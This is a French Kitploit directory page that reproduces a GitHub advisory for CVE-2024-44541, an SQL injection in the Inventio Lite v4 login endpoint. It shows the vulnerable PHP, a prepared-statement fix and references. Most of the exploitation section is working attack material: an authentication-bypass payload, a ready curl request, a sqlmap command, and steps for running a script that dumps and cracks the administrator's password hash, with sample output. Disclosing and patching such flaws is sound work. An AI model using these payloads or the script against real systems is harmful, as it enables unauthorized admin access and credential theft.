Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-44541 — This repository details a SQL Injection vulnerability in Inventio Lite v4's, including exploitation steps and a Python script to automate the attack. It provides information on the vulnerable code, recommended fixes, and how to extract and decrypt administrative credentials. | Kitploit
Outils/GitHubGitHub/pointedsec/cve-2024-44541
Password CrackingVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubpointedsec/cve-2024-44541

CVE-2024-44541

This repository details a SQL Injection vulnerability in Inventio Lite v4's, including exploitation steps and a Python script to automate the attack. It provides information on the vulnerable code, recommended fixes, and how to extract and decrypt administrative credentials.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 1 anPas encore vérifié

CVE-2024-44541: Vulnérabilité d'injection SQL dans Inventio Lite v4

Description

Inventio Lite v4 est vulnérable à l'injection SQL (SQLi) dans le point de terminaison /action=processlogin. Cette vulnérabilité permet à un attaquant d'injecter des requêtes SQL arbitraires via le paramètre username dans les requêtes POST, ce qui peut conduire à un accès non autorisé et à une extraction de données.

Code vulnérable

Le code vulnérable est le suivant :

root@kitploit:~
if(!isset($_SESSION["user_id"])) {
    $user = $_POST['username'];
    $pass = sha1(md5($_POST['password']));

    $base = new Database();
    $con = $base->connect();
    $sql = "select * from user where (email= \"".$user."\" or username= \"".$user."\") and password= \"".$pass."\" and is_active=1";
    $query = $con->query($sql);
    $found = false;
    $userid = null;
    while($r = $query->fetch_array()){
        $found = true;
        $userid = $r['id'];
    }
}

Capture d'écran du code vulnérable : Code vulnérable

Code corrigé

Le problème est corrigé en utilisant des requêtes préparées :

root@kitploit:~
if(!isset($_SESSION["user_id"])) {
    $user = $_POST['username'];
    $pass = sha1(md5($_POST['password']));

    $base = new Database();
    $con = $base->connect();

    // Prepare the query
    $stmt = $con->prepare("
        SELECT * FROM user 
        WHERE (email = ? OR username = ?) 
        AND password = ? 
        AND is_active = 1
    ");

    // Bind parameters
    $stmt->bind_param("sss", $user, $user, $pass);

    // Execute query
    $stmt->execute();

    // Get result
    $result = $stmt->get_result();
    $found = false;
    $userid = null;

    while($r = $result->fetch_assoc()){
        $found = true;
        $userid = $r['id'];
    }

    // Close statement
    $stmt->close();
}

Exploitation

Charge utile pour contournement d'authentification

Pour exploiter cette vulnérabilité, utilisez la charge utile suivante :

root@kitploit:~
user -> ") or 1=1-- - 
pass -> blablalba

Exemple d'attaque avec curl :

root@kitploit:~
$ curl -X POST http://192.168.1.51/inventio-lite/?action=processlogin -d 'username=%22%29%20or%201%3D1--%20-&password=blablabla' -v && echo ""

Exemple avec SQLMap

root@kitploit:~
$ sqlmap -u http://192.168.1.51/inventio-lite/?action=processlogin --data="username=*&password=*" --level 5 --risk 3 --dbms=mysql --dbs --prefix='")' --batch --dbs

Script d'exploitation

Pour automatiser l'exploitation et l'extraction du nom d'utilisateur et du hachage du mot de passe de l'administrateur, vous pouvez utiliser le script Python fourni, sqli.py.

Vous pouvez cloner ce dépôt :

root@kitploit:~
git clone https://github.com/pointedsec/CVE-2024-44541

Installez ensuite les dépendances avec pip :

root@kitploit:~
pip install -r requirements.txt

Modifiez les variables suivantes dans le script selon vos besoins :

  • BASE_URL = "http://192.168.1.51/inventio-lite/"
  • PWD_DIC_PATH = "/usr/share/wordlists/rockyou.txt"

Exécutez le script, qui extraira le nom d'utilisateur et le hachage de l'administrateur, puis tentera de casser le hachage avec le format SHA1(MD5(password)).

Exemple de sortie :

root@kitploit:~
$ python3 sqli.py 
[*] Checking if target is vulnerable
[+] Target Vulnerable!
[*] Dumping Administrator username...
[◤] Extracting Username: -> [email protected]
[/] Extracting Admin Password Hash: Final Admin Hash: 90b9aa7e25f80cf4f64e990b78a9fc5ebd6cecad
[+] Password Decrypted! -> [email protected]:admin
[*] Try to Log In with that username, if that doesn't work, try with some uppercase/lowercase combinations

Impact

Confidentialité : Les attaquants peuvent vider l'intégralité de la base de données, exposant des données sensibles telles que les identifiants des utilisateurs et leurs informations personnelles.

Intégrité : Les attaquants peuvent contourner l'authentification et obtenir un accès administrateur, leur permettant de modifier ou de supprimer des données.

Références

  • Dépôt GitHub Inventio Lite
  • https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-44541
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-44541
  • https://nvd.nist.gov/vuln/detail/CVE-2024-44541

Crédits

Ce rapport de vulnérabilité a été identifié par Andrés Del Cerro. Pour plus de détails, veuillez me contacter à [email protected]

Télécharger l’outil